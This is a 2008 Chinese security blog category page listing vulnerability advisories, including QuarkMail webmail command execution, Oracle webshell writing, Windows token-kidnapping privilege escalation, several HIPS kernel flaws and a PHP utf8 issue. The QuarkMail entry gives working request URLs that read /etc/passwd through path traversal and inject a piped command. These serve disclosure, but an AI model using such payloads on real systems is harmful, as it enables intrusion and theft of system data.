分类 ‘技术文章’ 下的日志

快客电邮(QuarkMail)远程命令执行漏洞

2008/10/12 16:54 | 鬼仔 | 技术文章 | 2 个回复

来源:80sec

漏洞说明:快客电邮(QuarkMail)是北京雄智伟业科技公司推出的电子邮件系 统,被广泛用于各个领域的电子邮件解决方案,其webmail部分使用perl cgi编写,但是80sec在其系统中发现一个重大的安全漏洞,导致远程用户可以在邮件系统上以当前进程身份执行任意命令,从而进一步控制主机或者系统。

漏洞厂商:http://www.ipmotor.com/

漏洞解析:QuarkMail错误地使用perl的open函数以打开文件,实现模板等功能,但是其对用户传入的参数没有做有效的过滤,从而导致一个命令执行漏洞。

漏洞证明:登录进入系统之后访问如下URL

http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../ etc/passwd%00&id=2&sort=0&read_flag=yes

即可得到系统账户文件,访问如下URL

http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../usr/bin/id|%00&id=2&sort=0&read_flag=yes

即可以将/usr/bin/id文件打开执行,并且将结果返回,用户就可以利用一序列操作获得系统的完整访问权。

漏洞解决:请等待官方补丁。

Tags: ,

ORACLE 建立数据文件WriteWebShell

2008/10/12 15:39 | 鬼仔 | 技术文章 | 消灭0回复

作者: kj021320

转载请注明出处

其实 类似ORACLE 这样强大的数据库,真没必要用到这么土的办法

SQLJ   存储过程写文件也可以,逼于无奈对方机器不支持SQLJ  还有  UTL_FILE包也被干掉了?

那 也可以 使用以下我说的这个方式
阅读全文 »

Tags: ,

MS Windows Token Kidnapping本地提权的解决方案

2008/10/11 13:54 | 鬼仔 | 技术文章 | 消灭0回复

作者:

昨天放出来的exp让大家狠狠的爽了一把吧,听说有人连续提权了十多台webshell的。

今天MS更新了安全公告

这个漏洞是由于在NetworkService 或者 LocalService 下运行的代码,可以访问同样是在 NetworkService 或者 LocalService 下运行的进程,某些进程允许提升权限为LocalSystem

对于IIS,默认安装是不受影响的,受影响的是你的ASP.NET代码是以 Full Trust 运行,如果权限低于 Full Trust,也不会受影响。老的Asp 代码不受影响,只有 ASP.NET才受影响。
阅读全文 »

Tags: ,

微点主动防御(version20081008)及以下本地权限提升漏洞(user权限下绕过UAC、主动防御)

2008/10/09 1:02 | 鬼仔 | 技术文章 | 消灭0回复

作者:MJ0011

微点主动防御是一款号称使用行为分析技术实时保护的主动防御软件。

其核心驱动MP110001.SYS最新版本存在本地权限提升漏洞,可导致任何权限的用户在本地提升权限到SYSTEM权限,绕过UAC等保护。同时也可以利用此漏洞注入到任何受保护进程,从而穿透防火墙、主动防御软件。

出问题的组件:MP110001.sys,版本号:1.2.10006 CheckSum = 0x00009F60 TimeStamp = 0x43620505
阅读全文 »

Tags: ,

Real-Time Defender v1.0 多处内核拒绝服务漏洞

2008/10/09 1:01 | 鬼仔 | 技术文章 | 消灭0回复

作者:MJ0011

Real-time Defender Professional(简称RTD)是一款主机入侵防护系统。

RTD的最新版本v1.0中存在多处内核拒绝服务漏洞,可导致任意权限用户在安装了RTD的系统上可引发蓝屏。

出问题的组件:ProSecur.sys ,版本:1.1.1.0,CheckSum = 0x00046c99 , TimeStamp = 0x48a51de8
阅读全文 »

Tags: ,

Malware Defender 1.1.3(2008-09-24)及以下版本多处内核拒绝服务漏洞

2008/10/09 0:59 | 鬼仔 | 技术文章 | 消灭0回复

作者:MJ0011

Malware Defender(简称MD)是一个HIPS & Anti-Rootkit工具。

Malware Defender最新版本1.1.3(2008-09-24)的内核驱动存在多处内核拒绝服务漏洞,任意权限的用户在安装了MD可引发蓝屏出问题的组件:mdcore.sys(安装后随机命名) 版本1.1.0.0 CheckSum = 0x0003C26C TimeStamp = 0x48d88131
阅读全文 »

Tags: ,

中网S3主机安全系统2008版本3.5.0.2(及以下)多处内核拒绝服务漏洞

2008/10/09 0:57 | 鬼仔 | 技术文章 | 消灭0回复

作者:MJ0011

中网S3是一款号称4D & 4M齐全的防火墙、HIDS/HIPS软件

其最新版本3.5.0.2及以下所有版本的驱动程序存在多出内核拒绝服务漏洞,可使任何权限用户在安装了中网S3的系统上引发蓝屏

出问题的组件(已验证版本):NCFileMon.sys ,版本:5.2.3700.0(囧) , CheckSum = 0x00036d61,TimeStamp = 0x46f774e2
阅读全文 »

Tags: ,

php utf8 decode漏洞

2008/10/08 14:07 | 鬼仔 | 技术文章 | 消灭0回复

来源:80sec

漏洞说明: php是一款被广泛使用的编程语言,可以被嵌套在html里用做web程序开发。但是在php里使用的某些编码函数在处理畸形的utf8序列时会产生不正确的结果,这样在某些情况下可能会引起应用程序的安全漏洞,绕过某些逻辑过滤等等。

漏洞成因:php在处理utf8编码时,对畸形的序列处理不当,如
阅读全文 »

Tags: , , ,